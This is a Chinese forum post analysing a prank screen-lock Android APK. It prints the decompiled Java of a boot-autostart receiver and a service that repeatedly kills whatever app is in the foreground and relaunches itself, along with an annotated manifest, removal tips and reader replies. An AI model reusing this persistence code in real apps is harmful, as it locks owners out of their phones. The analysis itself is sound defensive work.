夺命锁apk恶意程序简单分析

Sp4ce · 发表于 2014-9-10 23:56

本帖最后由轩少于 2014-9-11 20:47 编辑

文件相关信息:
C:\Documents and Settings\Administrator\桌面\夺命锁\1.apk
大小: 33528 字节
修改时间: 2014年7月8日, 15:05:48
MD5: EB447AF6B1824530FE63359A33467B13
SHA1: A5D9C553A7706A6A88C16F2221268C1B4A98A906
CRC32: F19DD189

因为这是本论坛一位用户发的样本，我以前也见过，差点被阴了。。
帖子地址：http://www.52pojie.cn/thread-271399-1-1.html
样本下载地址：http://www.52pojie.cn/forum.php? ... DM1fDI3MTM5OQ%3D%3D

使用工具：AXMLPrinter2
dex2jar
jd_Gui
XMLView（不带要用记事本的用这个看翻译过XML文档，记得把txt改为.xml后缀）

1.使用解压软件右键解压得到以下文件：

2.下载dex2jar工具解压：
把classes.dex 拷贝到dex2jar目录下：在路径上输入cmd后再输入：dex2jar.bat classes.dex 回车后
得到文件：classes_dex2jar.jar

3.使用jd_Gui打开刚才得到classes_dex2jar.jar文件：

4.查看具体代码：
BootBroadcastReceiver代码如下：

[Java] 纯文本查看 复制代码

package tk.jianmo.study;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;

public class BootBroadcastReceiver extends BroadcastReceiver
{
  String action_boot = "android.intent.action.BOOT_COMPLETED";

  @Override
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    try
    {
      Class localClass = Class.forName("tk.jianmo.study.MainActivity");
      Intent localIntent = new Intent(paramContext, localClass);
      localIntent.addFlags(268435456);
      paramContext.startActivity(localIntent);
      return;
    }
    catch (ClassNotFoundException localClassNotFoundException)
    {
      NoClassDefFoundError localNoClassDefFoundError = new NoClassDefFoundError(localClassNotFoundException.getMessage());
      throw localNoClassDefFoundError;
    }
  }
}

BuildConfig代码如下：

[Java] 纯文本查看 复制代码

[/font][/color][font=微软雅黑][color=#ff0000]public final class BuildConfig[/color]
[color=#ff0000]{[/color]
[color=#ff0000]  public static final boolean DEBUG = true;[/color]
[color=#ff0000]}[/color]
[/font][color=#ff00][font=微软雅黑]

R文件代码如下：

[Java] 纯文本查看 复制代码

[/font][/color][font=微软雅黑][color=#ff0000]package tk.jianmo.study;[/color]
[color=#ff0000]
[/color]
[color=#ff0000]public final class R[/color]
[color=#ff0000]{[/color]
[color=#ff0000]  public static final class attr[/color]
[color=#ff0000]  {[/color]
[color=#ff0000]  }[/color]
[color=#ff0000]
[/color]
[color=#ff0000]  public static final class drawable[/color]
[color=#ff0000]  {[/color]
[color=#ff0000]    public static final int d1 = 2130837504;[/color]
[color=#ff0000]    public static final int d2 = 2130837505;[/color]
[color=#ff0000]    public static final int ic_launcher = 2130837506;[/color]
[color=#ff0000]    public static final int mybutton = 2130837507;[/color]
[color=#ff0000]    public static final int sp = 2130837508;[/color]
[color=#ff0000]  }[/color]
[color=#ff0000]
[/color]
[color=#ff0000]  public static final class id[/color]
[color=#ff0000]  {[/color]
[color=#ff0000]    public static final int bn_bf = 2131034112;[/color]
[color=#ff0000]    public static final int bn_hy = 2131034113;[/color]
[color=#ff0000]    public static final int mainTextViewTime = 2131034114;[/color]
[color=#ff0000]  }[/color]
[color=#ff0000]
[/color]
[color=#ff0000]  public static final class layout[/color]
[color=#ff0000]  {[/color]
[color=#ff0000]    public static final int main = 2130903040;[/color]
[color=#ff0000]  }[/color]
[color=#ff0000]
[/color]
[color=#ff0000]  public static final class string[/color]
[color=#ff0000]  {[/color]
[color=#ff0000]    public static final int app_name = 2130968577;[/color]
[color=#ff0000]    public static final int hello = 2130968576;[/color]
[color=#ff0000]  }[/color]
[color=#ff0000]}[/color]
[/font][color=#ff00][font=微软雅黑]

killpoccessserve代码如下：

[Java] 纯文本查看 复制代码

[/font][/color][font=微软雅黑][color=#ff0000]package tk.jianmo.study;[/color]
[color=#ff0000]
[/color]
[color=#ff0000]import android.app.ActivityManager;[/color]
[color=#ff0000]import android.app.ActivityManager.RunningTaskInfo;[/color]
[color=#ff0000]import android.app.Service;[/color]
[color=#ff0000]import android.content.ComponentName;[/color]
[color=#ff0000]import android.content.Context;[/color]
[color=#ff0000]import android.content.Intent;[/color]
[color=#ff0000]import android.os.Handler;[/color]
[color=#ff0000]import android.os.Handler.Callback;[/color]
[color=#ff0000]import android.os.IBinder;[/color]
[color=#ff0000]import android.os.Message;[/color]
[color=#ff0000]import java.util.List;[/color]
[color=#ff0000]import java.util.Timer;[/color]
[color=#ff0000]import java.util.TimerTask;[/color]
[color=#ff0000]
[/color]
[color=#ff0000]public class killpoccessserve extends Service[/color]
[color=#ff0000]{[/color]
[color=#ff0000]  Context context;[/color]
[color=#ff0000]
[/color]
[color=#ff0000]  @Override[/color]
[color=#ff0000]  public IBinder onBind(Intent paramIntent)[/color]
[color=#ff0000]  {[/color]
[color=#ff0000]    return null;[/color]
[color=#ff0000]  }[/color]
[color=#ff0000]
[/color]
[color=#ff0000]  @Override[/color]
[color=#ff0000]  public void onCreate()[/color]
[color=#ff0000]  {[/color]
[color=#ff0000]    this.context = this;[/color]
[color=#ff0000]    Handler.Callback local100000000 = new Handler.Callback()[/color]
[color=#ff0000]    {[/color]
[color=#ff0000]      public boolean handleMessage(Message paramAnonymousMessage)[/color]
[color=#ff0000]      {[/color]
[color=#ff0000]        ActivityManager localActivityManager = (ActivityManager)killpoccessserve.this.context.getSystemService("activity");[/color]
[color=#ff0000]        String str = ((ActivityManager.RunningTaskInfo)localActivityManager.getRunningTasks(1).get(0)).topActivity.getPackageName();[/color]
[color=#ff0000]        if (str.equals("tk.jianmo.study"));[/color]
[color=#ff0000]        while (true)[/color]
[color=#ff0000]        {[/color]
[color=#ff0000]          return false;[/color]
[color=#ff0000]          Intent localIntent = new Intent();[/color]
[color=#ff0000]          Context localContext = killpoccessserve.this.context;[/color]
[color=#ff0000]          try[/color]
[color=#ff0000]          {[/color]
[color=#ff0000]            Class localClass = Class.forName("tk.jianmo.study.MainActivity");[/color]
[color=#ff0000]            localIntent.setClass(localContext, localClass);[/color]
[color=#ff0000]            localIntent.setFlags(67108864);[/color]
[color=#ff0000]            localIntent.addFlags(268435456);[/color]
[color=#ff0000]            killpoccessserve.this.startActivity(localIntent);[/color]
[color=#ff0000]            localActivityManager.killBackgroundProcesses(str);[/color]
[color=#ff0000]          }[/color]
[color=#ff0000]          catch (ClassNotFoundException localClassNotFoundException)[/color]
[color=#ff0000]          {[/color]
[color=#ff0000]            NoClassDefFoundError localNoClassDefFoundError = new NoClassDefFoundError(localClassNotFoundException.getMessage());[/color]
[color=#ff0000]            throw localNoClassDefFoundError;[/color]
[color=#ff0000]          }[/color]
[color=#ff0000]        }[/color]
[color=#ff0000]      }[/color]
[color=#ff0000]    };[/color]
[color=#ff0000]    Handler localHandler = new Handler(local100000000);[/color]
[color=#ff0000]    Timer localTimer = new Timer();[/color]
[color=#ff0000]    TimerTask local100000001 = new TimerTask()[/color][color=#0000ff]//定时任务[/color]
[color=#ff0000]    {[/color]
[color=#ff0000]      private final Handler val$h;[/color]
[color=#ff0000]
[/color]
[color=#ff0000]      @Override[/color]
[color=#ff0000]      public void run()[/color]
[color=#ff0000]      {[/color]
[color=#ff0000]        this.val$h.obtainMessage().sendToTarget();[/color]
[color=#ff0000]      }[/color]
[color=#ff0000]    };[/color]
[color=#ff0000]    localTimer.schedule(local100000001, 0, '–');[/color]
[color=#ff0000]  }[/color]
[color=#ff0000]
[/color]
[color=#ff0000]  @Override[/color]
[color=#ff0000]  public void onDestroy()[/color]
[color=#ff0000]  {[/color]
[color=#ff0000]    super.onDestroy();[/color]
[color=#ff0000]  }[/color]
[color=#ff0000]
[/color]
[color=#ff0000]  @Override[/color]
[color=#ff0000]  public void onStart(Intent paramIntent, int paramInt)[/color]
[color=#ff0000]  {[/color]
[color=#ff0000]    super.onStart(paramIntent, paramInt);[/color]
[color=#ff0000]  }[/color]
[color=#ff0000]}[/color]
[/font][color=#ff00][font=微软雅黑]

经过AXMLPrinter2翻译后的main.xml代码就一行，
<?xml version="1.0" encoding="utf-8"?>

经过AXMLPrinter2翻译后的AndroidManifest.xml的代码如下：

<?xml version="1.0" encoding="utf-8"?>
<manifest
      xmlns:android="http://schemas.android.com/apk/res/android"
      android:versionCode="1"
      android:versionName="3.0"
      package="tk.jianmo.study"
      >
      <uses-sdk
            android:minSdkVersion="8"
            android:targetSdkVersion="11"
            >
      </uses-sdk>
      <application
            android:label="@7F040001"
            android:icon="@7F020002"
            android:debuggable="true"
            >
            <service
                     android:name=".killpoccessserve"//这个服务会循环检测当前的顶层程序是不是自己,如果不是自己,就杀掉它,并启动自己
                     >
            </service>
                     />

            <activity
                     android:theme="@android:01030007"
                     android:label="@7F040001"
                     android:name=".MainActivity"
                     >
                     <intent-filter
                              >
                              <action
                                    android:name="android.intent.action.MAIN"
                                    >
                              </action>
                              <category
                                    android:name="android.intent.category.LAUNCHER"
                                    >
                              </category>
                     </intent-filter>
            </activity>
            <receiver
                     android:name=".BootBroadcastReceiver"//实现开机自启
                     >
                     <intent-filter
                              >
                              <action
                                    android:name="android.intent.action.BOOT_COMPLETED"//开机广播（开机自启）
                                    >
                              </action>
                              <action
                                    android:name="android.intent.action.BOOT_COMPLETED"//开机广播（开机自启）
                                    >
                              </action>
                              <action
                                    android:name="android.intent.ACTION_SCREEN_OFF"//关机广播（应该是倒计时关机的）
                                    >
                              </action>
                              <action
                                    android:name="android.net.conn.CONNECTIVITY_CHANGE"//监听网络变化
                                    >
                              </action>
                              <action
                                    android:name="android.net.wifi.WIFI_STATE_CHANGED"//监听WIFI变化
                                    >
                              </action>
                              <action
                                    android:name="android.net.wifi.STATE_CHANGE"//检测WIFI状态
                                    >
                              </action>
                              <category
                                    android:name="android.intent.category.HOME"//更换安卓桌面
                                    >
                              </category>
                     </intent-filter>
            </receiver>
      </application>
      <uses-permission
            android:name="android.permission.ACCESS_WIFI_STATE"//允许程序访问Wi-Fi网络状态信息
            >
      </uses-permission>
      <uses-permission
            android:name="android.permission.CHANGE_WIFI_STATE"//改变WIFI状态
            >
      </uses-permission>
      <uses-permission
            android:name="android.permission.RECEIVE_BOOT_COMPLETED"//允许程序接收到 ACTION_BOOT_COMPLETED广播在系统完成启动（开机自启）
            >
      </uses-permission>
      <uses-permission
            android:name="android.permission.KILL_BACKGROUND_PROCESSES"//关闭后台程序
            >
      </uses-permission>
      <uses-permission
            android:name="android.permission.GET_TASKS"//检索正在运行的应用
            >
      </uses-permission>
      <uses-permission
            android:name="android.permission.WAKE_LOCK"//阻止手机进入休眠状态
            >
      </uses-permission>
</manifest>
小结：通过AndroidManifest.xml等，我们不难看出，这款APP索取了：开机自启、检测当前运行程序、关闭后台、前台程序、禁止系统进入休眠状态等权限，但它的性质终究是款恶作剧软件，它的锁屏界面保存在\res\文件夹下，它在打开的同时设定了一个定时任务（关机），并且实现开机自启，后台自启，想干掉它还是很容易的。

清理它的方法很多，在这里举几个例子：
1.进入recovery模式双WPIE操作（谨慎！手机中无重要文件可用！）
2.用手机助手PC端的程序清理
3.小米系统先按主屏键3秒然后杀掉进程再卸载（未测试……）

【另：感谢JJ师傅……】

小帥 · 发表于 2014-9-11 00:10

虽然看不懂，但是感脚很高深

huai201208 · 发表于 2014-9-11 00:01

哎呀，我是第一个。；留个脚步，虽然我都看不懂，但是看着这么多的英文，赞你一个！！！！

as593709348 · 发表于 2014-9-11 00:56

好可怕的样子

我可能干了 · 发表于 2014-9-11 06:08

能否简单易懂点

淡然出尘 · 发表于 2014-9-11 07:11

额为啥没有代码注释？

孤独无败 · 发表于 2014-9-11 07:40

提示: 作者被禁止或删除内容自动屏蔽

hu007 · 发表于 2014-9-11 08:09

谢谢分享，学习了

kangkai · 发表于 2014-9-11 08:12

轩少出马，必属精品。

fishyoyo · 发表于 2014-9-11 08:15

膜拜大神····

帐号		自动登录	找回密码
密码			注册[Register]

孤独无败孤独无败当前离线好友阅读权限 0 听众最后登录 1970-1-1 头像被屏蔽	孤独无败发表于 2014-9-11 07:40 提示: 作者被禁止或删除内容自动屏蔽
孤独无败孤独无败当前离线好友阅读权限 0 听众最后登录 1970-1-1 头像被屏蔽
	回复支持举报

[移动样本分析] 夺命锁apk恶意程序简单分析

点评